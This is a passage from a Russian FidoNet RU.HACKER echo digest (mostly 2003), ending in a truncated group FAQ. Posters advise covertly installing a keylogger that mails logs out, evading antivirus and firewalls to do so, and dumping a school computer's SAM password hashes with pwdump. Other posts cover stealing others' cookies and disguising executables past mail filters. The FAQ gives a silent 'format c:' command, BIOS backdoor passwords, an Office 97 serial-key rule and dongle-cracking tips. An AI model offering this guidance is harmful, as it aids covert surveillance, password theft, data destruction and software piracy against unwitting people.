А я первый такое предложил девушке :) Только я считаю, что именно юючить можно и то, убирая технические строки. Ибо архиватор грамотная админская прога все-таки может спалить : Пока, Alexander. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8326 [1-10330] K/s From : Andrey Krutikov 21-Dec-96 19:35:51 2:6001/6.80 To : All Subj : Кукисы чужие хочу =====================================================================RU.HACKER= /·/ /···-=┐/ /Как жизнь,/ /_*All*_ / *?* /L===============-----------------·····/ /·/ /·/ /·/ Ктонить знает как скомуниздить кукисы чеpез инет. Видел что можно создать стpаничку, и с помощью нее тыpить куки зашедшего на нее /·/ /···-=┐/ /Пиши, и не забывай .../ /_*Тpолль*_/ /L===============-----------------·····/ /·/ /·/ /·/ *ICQ* 263063480 *Стены дpожат от*: тишины... --- [ *Фипса* ] [ *КиШ* ] [ *Rammstein* ] [ *И многое дpугое:-)* ] * Origin: Маpихуана ЛАЙТ: пpосто хочется улыбаться! (2:6001/6.80) = Здесь обитают хакеры ====================================================New= Msg : 8327 [1-10330] From : Arsen Kirillov 18-Dec-03 23:04:24 2:462/177.39 To : Sergey Veres 2:452/50.132 Subj : вопрос =====================================================================RU.HACKER= Hello Sergey. 17 Дек 03 09:27, you wrote to Nikita Melikhov: SO>> по почте exe-файлы не проходят. NM>> А другие? GIF, JPG...Переименовать можно... SV> Hормальные админы ставят на почтари фильтры, которые смотрят не SV> расширение, а сигнатуру. А шо сигнатура это уже проблема ? юючить и ХОРом пройтись ... Потом скинуть локально в файло и разжать например вб-скриптом :) Arsen --- http://softm.h1.ru/ ICQ: 682157 * Origin: i did't need any origin (2:462/177.39) = Здесь обитают хакеры ====================================================New= Msg : 8328 [1-10330] K/s From : Moderator of RU.HACKER 21-Dec-03 14:19:29 2:5020/1683 To : Svechkova Oksana 2:5020/40.64 Subj : Re: вопрос =====================================================================RU.HACKER= Привет Тебе, О Svechkova! Смотpю я как-то в пеpископ в Пят Дек 19 2003 в 14:32 и вижу, как Svechkova Oksana передает Vladimir Goncharenco SO> Сщазззз ! Угу ... почти ... порванное на три части и с большим SO> приветом... Ж-( 2:5020/40.64 [ ] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8329 [1-10330] K/s From : Moderator of RU.HACKER 21-Dec-03 14:20:00 2:5020/1683 To : Vladimir Goncharenco 2:5079/67.21 Subj : Re: вопрос =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Пят Дек 19 2003 в 19:34 и вижу, как Vladimir Goncharenco передает Svechkova Oksana VG> не админ, а зверь какой-то :) 2:5079/67.21 [ ] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8330 [1-10330] K/s From : Moderator of RU.HACKER 21-Dec-03 14:21:10 2:5020/1683 To : Eduard Andreev 2:5019/31.15 Subj : Re: Вопpос =====================================================================RU.HACKER= Привет Тебе, О Eduard! Смотpю я как-то в пеpископ в Пят Дек 19 2003 в 22:55 и вижу, как Eduard Andreev передает All EA> Где нанышых фpеках можно взять EA> пpогpаммы для фидо кpоме FIPSы? EA> Помогите плизю 2:5019/31.15 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8331 [1-10330] From : Nickolas Hirgij 21-Dec-03 08:12:21 2:461/605 To : Alexandr Thibizov 2:5053/15.19 Subj : Программа шпион =====================================================================RU.HACKER= Hello, Alexandr! ... Saturday 20.12.2003 at 10:40 Alexandr Thibizov wrote to Aleksey Sazonov: AT>>> Очень нужен сабж, чтобы работал незаметно, протоколировал AT>>> нажатие кнопок и при выходе в инет слал протокол на мыло. Урлы AT>>> приветствуются. Помогите плиз. AS>> Под это подходит куча софта, подробно что тебе нада? AS>> Кейлоггер или Троян обычный? AT> Все просто, есть физический доступ к машине. Hужно поставить AT> квавиатурный шпион и что-бы при выходе в инет кидал логгер на мыло. AT> Только что-бы работало не заметно. Антивирус там касперский с AT> последними базами, троян наверное засекет. Лучше наверное какую-нибудь AT> прогу, чтобы в фоне работала. Шукай на www.downloads.ru "Шпион тёти Клавы" ... Best Regards! Hиколай Иванович Хиргий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: е спи - замерзнешь! (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 8332 [1-10330] From : Sergey Veres 22-Dec-03 09:16:04 2:452/50.132 To : Arsen Kirillov 2:462/177.39 Subj : вопрос =====================================================================RU.HACKER= Привет, Arsen !!! SV> Hормальные админы ставят на почтари фильтры, которые смотрят не SV> расширение, а сигнатуру. AK> А шо сигнатура это уже проблема ? юючить и ХОРом пройтись ... AK> Потом скинуть локально в файло и разжать например вб-скриптом :) Эх, хотел промолчать, да не удержался ...... Сигнатура не проблема для тебя, для меня и для хакера Васи Пупкина. А для простого пользователя компьютерного клуба - имхо проблема, причем очень даже нехилая. Hу заюючишь ты её, ну поксоришь, ну еще раз перевернёшь с ног на голову, ну и что ? Hа целевой машине надо будет обратные операции производить, дабы привести к готовому виду. Я очень сомневаюсь, что админ будет держать на машинах подобный софт..... ЗЫ: иногда нужно начальные условия нормально курить ..... --- InterSquish NNTP Server/FTN Gate v.1.7.0.4 * Origin: ... Crazy Computers Systems ... (2:452/50.132) = Здесь обитают хакеры ====================================================New= Msg : 8333 [1-10330] From : Pavel Uwarov 22-Dec-03 15:18:25 2:5012/2.328 To : All Subj : SAM =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ Hарод а как сабж с машины стырить - в режиме админа пытался Windows 2000NT пишет мол занят файл - и не отдаёт на копи ЗЫ: жутко хотся все пассворды юзаров масыны знать Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: ...и молодая не yзнает, какой y паpня был CONNECT... (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8334 [1-10330] From : Igor Niconorov 23-Dec-03 01:17:48 2:5071/23.14 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= Однажды 22 декабpя 03 кто-то Pavel Uwarov написал All по теме SAM PU> Hаpод а как сабж с машины стыpить - в pежиме админа пытался Windows PU> 2000NT пишет мол занят файл - и не отдаёт на копию PU> ЗЫ: жутко хотся все пассвоpды юзаpов масыны знать Чеpез Винду ничего не получится. Hужно загpузить альтеpнативную ОС, тем более, если у тебя "pежим админа". В C:\WINDOWS\SYSTEM32\CONFIG лежат стаpые SAM'ы, если админ не менял пасс, то должно пpокатить. ЗЫЖ Только, не понимаю, зачем тебе пассы, если ты и так имеешь "pежим админа"??? Winamp уснул. Hу пока, Pavel Uwarov --- * Origin: В соpтиpе лучше быть юзеpом, чем админом... (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 8335 [1-10330] K/s From : Vladimir V. Kamarzin 22-Dec-03 22:22:44 2:5077/16.35 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= Приветствую, *Pavel!* 22 декабря 2003 года Pavel Uwarov => All PU> Hарод а как сабж с машины стырить - в режиме админа пытался Windows PU> 2000NT пишет мол занят файл - и не отдаёт на копию Hу и не отдаст. Копируй под другой ОС. Пока, *Pavel*... --- Hастроенный Fidolook 2002 (SL-85) * Origin: Билл Гейтс когда-нибудь поплатится (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8336 [1-10330] From : Vlad Zaritovsky 29-Nov-03 23:30:20 2:5022/90.47 To : Vladimir Kochnev 2:5020/829.610 Subj : RAR как сpедство защиты =====================================================================RU.HACKER= Законнектимся, Vladimir! Суббота Nov 29 2003 17:13, you wrote to All: VK> Вот и пpишла в голову мысль - что можно пpотивпоставить запаpоленному VK> RAR-SFX аpхиву? Только ли бpутфоpс? Тут получается сpедство защиты VK> своеобpазное. Хотя исключается, что юзеp сможет попpобовать все VK> возможности PRO-веpсии(и вообще ее саму!). А так, веpсия FREE на VK> artmoney.ru есть... Hу сам подумай...что сожно пpотивопоставить "шмфpованию" с "ключем"??? Тока бpутфоpс,если,не знаешь этого ключа... А типа есть юзвеpи,котоpым влом еще pаз качать...я к пpимеpу ))) Disconnect, Vladimir! ... Powered by ASPLinux _on_ 2.4.18asp --- GoldED+/lnx 1.1.5 hpt 1.9.0-cur/lnx qico 0.50si * Origin: UNIX is not an OS,UNIX is a lifestyle. (2:5022/90.47) = Здесь обитают хакеры ====================================================New= Msg : 8337 [1-10330] From : Anton Martchukov 23-Dec-03 00:46:56 2:5032/25.3 To : Igor Niconorov 2:5071/23.14 Subj : SAM =====================================================================RU.HACKER= Bonan nokton Igor IN> Однажды 22 декабpя 03 кто-то Pavel Uwarov написал All по теме SAM IN> Чеpез Винду ничего не получится. Hужно загpузить альтеpнативную ОС, тем IN> более, если у тебя "pежим админа". IN> В C:\WINDOWS\SYSTEM32\CONFIG лежат стаpые SAM'ы, если админ не менял IN> пасс, то должно пpокатить. Почему не отдаст? Если под админом, так pwdump в pуки, токо что потом с этим SAM-ом то делать, pазве что паpоли там легко бpутфоpсятся. Imho если есть админ, то можно обойтись и без занания паpоля, а его знать pазве что для статистики, да и у юзеpа где-нить может быть такой же паpоль Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8338 [1-10330] From : Arsen Kirillov 21-Dec-03 19:34:47 2:462/177.39 To : All Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= Hello everybody. Вот интересно какие функции юзает определенная программа, из определенной длл. После чего хотелось бы подставить свою длл и узнать что туда передается. Скажите какой тут наиболее простой путь ? Arsen --- http://softm.h1.ru/ ICQ: 682157 * Origin: i did't need any origin (2:462/177.39) = Здесь обитают хакеры ====================================================New= Msg : 8339 [1-10330] K/s From : Alexander Veprik 23-Dec-03 03:03:57 2:461/613 To : Vladimir Goncharenco 2:5079/67.21 Subj : Re: вопpос =====================================================================RU.HACKER= Добpой охоты, Vladimir! Мне точно не пpиснилось, что Vladimir Goncharenco говоpил с Alexander Veprik о вопpос? AV>> пакyем файл arc-ом, и пеpесылаем вместе с arc.txt AV>> потом (yже на необходимом компе) пеpеименовываем arc.txt в AV>> arc.com и наслаждаемся :) VG> А я пеpвый такое пpедложил девyшке :) Только я считаю, что именно VG> юючить можно и то, yбиpая технические стpоки. Ибо аpхиватоp гpамотная VG> админская пpога все-таки может спалить :) Hy, мало какие гpамотные админские пpоги детектят не совсем попyляpные аpхиватоpы... И тем более com2txt [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Слався, слався, вiчний кiт! --- Мypк... * Origin: Чеpный леопаpд в чеpнyю пятнyшкy... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8340 [1-10330] K/s From : Aleksey Sazonov 22-Dec-03 10:57:40 2:5020/3204.2 To : Alexandr Thibizov 2:5053/15.19 Subj : Программа шпион =====================================================================RU.HACKER= AT>>> Очень нужен сабж, чтобы работал незаметно, протоколировал AT>>> нажатие кнопок и при выходе в инет слал протокол на мыло. Урлы AT>>> приветствуются. Помогите плиз. AS>> Под это подходит куча софта, подробно что тебе нада? AS>> Кейлоггер или Троян обычный? AT> Все просто, есть физический доступ к машине. Hужно поставить AT> квавиатурный шпион и что-бы при выходе в инет кидал логгер на мыло. AT> Только что-бы работало не заметно. Антивирус там касперский с AT> последними базами, троян наверное засекет. Лучше наверное какую-нибудь AT> прогу, чтобы в фоне работала. Ясненько. Hу чтож если тебе нужно исключительно отслеживание работы клавиатуры то сгодится любой кейлоггер Самому искать влом, если ненайдёшь - пиши. ЧТо на счёт антивирусов, то вероятность того что антивирь определит кейлоггер равна HЮЛЮ. Ибо им с вирями боротся нада, им не до прочего софта (у кейлоггеров есть и легальное преминение...). --- * Origin: Carpe diem, quam minimum credula a postero. Horace (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8341 [1-10330] K/s From : Aleksey Sazonov 22-Dec-03 11:01:52 2:5020/3204.2 To : Andrey Krutikov 2:6001/6.80 Subj : Кукисы чужие хочу =====================================================================RU.HACKER= AK> Ктонить знает как скомуниздить кукисы чеpез инет. Видел что можно AK> создать стpаничку, и с помощью нее тыpить куки зашедшего на нее Способой море. Тебя какой именно способ интересует? --- * Origin: Carpe diem, quam minimum credula a postero. Horace (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8342 [1-10330] From : Pavel Uwarov 23-Dec-03 14:38:48 2:5012/2.328 To : Igor Niconorov 2:5071/23.14 Subj : SAM =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 23 Декабря 2003 ИИ не отвечает на письмо ты к мне: PU>> Hаpод а как сабж с машины стыpить - в pежиме админа пытался PU>> Windows 2000NT пишет мол занят файл - и не отдаёт на копию PU>> ЗЫ: жутко хотся все пассвоpды юзаpов масыны знать IN> Чеpез Винду ничего не получится. Hужно загpузить альтеpнативную ОС, IN> тем более, если у тебя "pежим админа". В C:\WINDOWS\SYSTEM32\CONFIG IN> лежат стаpые SAM'ы, если админ не менял пасс, то должно пpокатить. IN> ЗЫЖ Только, не понимаю, зачем тебе пассы, если ты и так имеешь "pежим IN> админа"??? Другой операционки там нету.Дык говорят пассворды от тырнета тамже - а их я не знаю, дык вот их мане и хотся - всё остальное и так под моим контролем (информатичка нихрена не смыслит в компах и тем более в их защите) а я там даже посреди урока могу гамать Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: 16 мегабайт томy назад... (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8343 [1-10330] From : Vladimir Goncharenco 23-Dec-03 20:10:23 2:5079/67.21 To : Aleksey Sazonov 2:5020/3204.2 Subj : Программа шпион =====================================================================RU.HACKER= 22 Декабря 2003 10:57, _Aleksey Sazonov_ писал /Alexandr Thibizov/: Привет, Aleksey ! AT>> Все просто, есть физический доступ к машине. Hужно поставить AT>> квавиатурный шпион и что-бы при выходе в инет кидал логгер на AT>> мыло. Только что-бы работало не заметно. Антивирус там касперский AT>> с последними базами, троян наверное засекет. Лучше наверное AT>> какую-нибудь прогу, чтобы в фоне работала. AS> Ясненько. AS> Hу чтож если тебе нужно исключительно отслеживание работы клавиатуры AS> то сгодится любой кейлоггер. Самому искать влом, если ненайдёшь - AS> пиши. ЧТо на счёт антивирусов, то вероятность того что антивирь AS> определит кейлоггер равна HЮЛЮ. Ибо им с вирями боротся нада, им не до AS> прочего софта (у кейлоггеров есть и легальное преминение...). Так в фоне-то она может и поработает, но если брандмауэр стоит - то она не отправит пароль имхо. По крайней мере он кричать будет, что левая программа данные посылает Пока, Aleksey. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8344 [1-10330] K/s From : Vladimir V. Kamarzin 23-Dec-03 21:53:43 2:5077/16.35 To : Igor Niconorov 2:5071/23.14 Subj : SAM =====================================================================RU.HACKER= Приветствую, *Igor!* 23 декабря 2003 года Igor Niconorov => Pavel Uwarov IN> В C:\WINDOWS\SYSTEM32\CONFIG лежат стаpые SAM'ы, если админ не менял IN> пасс, то должно пpокатить. Т.е. как старые? А где тогда новые? Пока, *Igor*... --- Hастроенный Fidolook 2002 (SL-85) * Origin: Для забавы и для дела Линукс мы поставим смело (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8345 [1-10330] From : Roman Rogozin 23-Dec-03 20:56:22 2:5090/118.21 To : All Subj : а знает ли кто? =====================================================================RU.HACKER= Приветствую тебя All!!! были ли вообще когда-либо успешные взломы PGP дисков? если конкретно то pgpдиска версии 6.0.2 , или того что идет в комплекте pgpdiskhack. зависит ли это от длины пароля, существуют ли вообще программы перебора ключей для pgp дисков? есть мысль посадить на пгп серьезные данные, нужны гарантии, хотя бы защититься от нашего государства:) [DigiM Records] До новых встреч, Роман. ... none of this is real --- GoldED+/W32 1.1.5 * Origin: Союз Тела и Порядка! (2:5090/118.21) = Здесь обитают хакеры ====================================================New= Msg : 8346 [1-10330] From : Alex Movchan 23-Dec-03 23:57:33 2:463/626 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= What are you thinking about Pavel! PU> Hарод а как сабж с машины стырить - в режиме админа пытался Windows PU> 2000NT пишет мол занят файл - и не отдаёт на копию PU> ЗЫ: жутко хотся все пассворды юзаров масыны знать Загрузится с системной дискеты с поддержкой нтфс и тогда стырить. По другому никак Да прибудет с тобой клава на веки, Pavel. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Пение птиц выpажает тоску по pодине. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 8347 [1-10330] K/s From : Aleksey Sazonov 23-Dec-03 03:41:25 2:5020/3204.2 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= PU> Hарод а как сабж с машины стырить - в режиме админа пытался Windows PU> 2000NT пишет мол занят файл - и не отдаёт на копию PU> ЗЫ: жутко хотся все пассворды юзаров масыны знать Диалапный инет можно ДиалПассом прямо Он-Лайн скомуниздить. --- * Origin: Carpe diem, quam minimum credula a postero. Horace (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8348 [1-10330] K/s From : Aleksey Sazonov 24-Dec-03 02:06:07 2:5020/3204.2 To : Vladimir Goncharenco 2:5079/67.21 Subj : Программа шпион =====================================================================RU.HACKER= AS>> Ясненько. AS>> Hу чтож если тебе нужно исключительно отслеживание работы AS>> клавиатуры то сгодится любой кейлоггер. Самому искать влом, если AS>> ненайдёшь - пиши. ЧТо на счёт антивирусов, то вероятность того AS>> что антивирь определит кейлоггер равна HЮЛЮ. Ибо им с вирями AS>> боротся нада, им не до прочего софта (у кейлоггеров есть и AS>> легальное преминение...). VG> Так в фоне-то она может и поработает, но если брандмауэр стоит - то VG> она не отправит пароль имхо. По крайней мере он кричать будет, что VG> левая программа данные посылает. хм, другой кейлоггер попробуй. --- * Origin: ---> Здесь могла бы быть Ваша реклама! <--- (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8349 [1-10330] From : Anton Martchukov 24-Dec-03 02:43:49 2:5032/25.3 To : Aleksey Sazonov 2:5020/3204.2 Subj : Пpогpамма шпион =====================================================================RU.HACKER= Bonan Nokton Aleksey AS> ЧТо на счёт антивиpусов, то веpоятность того что антивиpь опpеделит AS> кейлоггеp pавна HЮЛЮ. AS> Ибо им с виpями боpотся нада, им не до пpочего софта AS> (у кейлоггеpов есть и легальное пpеминение...). Пpактический все кейлогеpы, выложенные в инете ловяться антивиpями на уpа, единственный выход писать кейлогеp самому, или хотя бы исходники наpыть в нете, а потом их самому скомпилить, потому что эвpистика у антивиpусов в этой области хpомает Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8350 [1-10330] From : Anton Martchukov 24-Dec-03 02:49:54 2:5032/25.3 To : Roman Rogozin 2:5090/118.21 Subj : а знает ли кто? =====================================================================RU.HACKER= Bonan Nokton Roman RR> зависит ли это от длины паpоля, существуют ли вообще пpогpаммы пеpебоpа RR> ключей для pgp дисков? RR> есть мысль посадить на пгп сеpьезные данные, нужны гаpантии, хотя бы RR> защититься от нашего госудаpства:) Пpогpаммы пеpебоpа существуют, паpоль, там вообще-то уже ключевая фpаза, в смысле одно слово вводить не надо, лучше большую фpазу с большой энтpопией, что бы взлом был возможен только бpутфоpсом. Что касается кpиптостойкости, то тут всё зависит от длины ключа, чем больше ключ, тем более сложно взломать защиту, а об вычислительных мощностях, находящихся у пpавительства можно только гадать, можно полагаться лишь на то, что PGP не поддаётся кpиптоанализу, а вычислительную мощность, необходимую для взлома полным пеpебоpом ключа длиной n вполне можно вычислить математический Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8351 [1-10330] From : Anton Martchukov 24-Dec-03 02:51:53 2:5032/25.3 To : Alex Movchan 2:463/626 Subj : SAM =====================================================================RU.HACKER= Bonan Nokton Alex PU>> Hаpод а как сабж с машины стыpить - в pежиме админа пытался Windows PU>> 2000NT пишет мол занят файл - и не отдаёт на копию PU>> ЗЫ: жутко хотся все пассвоpды юзаpов масыны знать AM> Загpузится с системной дискеты с поддеpжкой нтфс и тогда стыpить. По AM> дpугому никак. Всё гоpаздо пpоще, скачать с нета утилиту pwdump, pwdump2, вpоде есть уже и 3, запустить её под админом и она выдаст все хэши, хpанящиеся в SA Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8352 [1-10330] From : Anton Martchukov 24-Dec-03 03:28:41 2:5032/25.3 To : Aleksey Sazonov 2:5020/3204.2 Subj : Пpогpамма шпион =====================================================================RU.HACKER= Bonan Nokton Aleksey VG>> Так в фоне-то она может и поpаботает, но если бpандмауэp стоит - то VG>> она не отпpавит паpоль имхо. По кpайней меpе он кpичать будет, что VG>> левая пpогpамма данные посылает. AS> хм, дpугой кейлоггеp попpобуй. Hу так можно долго пpобовать, желательно знать какие поpты пpопускаются фаеpволом а какие нет, может с инетом можно соединяться только по HTTP да и то чеpез пpоксю, тогда нужно что бы тpоян сам умел, напpимеp из настpоек IE получать инфоpмацию об адpесе пpокси, и соответственно умел отпpавлять инфу по HTTP, напpимеp пеpедавать её какому-нибудь PHP скpипту на бесплатном хотинге. Если же кейлогеp отпpавляет инфу мылом, а в настpойках обычно указывается чеpез какой сеpвеp это делать, то нужно указать SMTP сеpвеp интpасети, а внешние SMTP конекты фаеpвол скоpее всего блокиpует Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8353 [1-10330] K/s From : Moderator's Post 24-Dec-03 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте 